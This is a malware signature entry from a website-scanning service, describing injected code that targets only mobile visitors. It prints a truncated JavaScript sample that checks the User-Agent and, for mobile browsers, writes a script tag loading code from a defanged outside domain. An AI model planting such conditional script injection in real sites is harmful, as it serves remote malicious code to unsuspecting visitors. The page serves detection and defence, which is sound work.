SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.mobile

malware.mobile

Description:
Detected malicious code that targets only visitors that use mobile devices. Typically malware checks either User-Agent header or screen dimensions to determine whether a mobile browser is used.

Malware that targets mobile users may use rewrite rules in .htaccess files, server-side scripts (e.g. PHP, ASP, etc) or client-side script (e.g. JavaScript).

Example of JavaScript based mobile malware

function isMobile() {

var a = (navigator.userAgent|​|navigator.vendor|​|window.opera);
    if(/android​.+mobile|avantgo|bada​/|blackberry|blazer|compal|elaine|fennec|hiptop|​iemobile|ip
    ...skipped...
    |nc|nw)|wmlb|wonu|x700|yas​-|your|zeto|zte-/i.​test(a.​substr(0,4))){ 
    return true;
    } 

return false;
}

if(isMobile() === true) {document .write('<script type="text/javascript" src="hxxp://tizermedias[.]com/odessa/​?H6rRyf"></script>');

Affecting: Any web site (no specific target).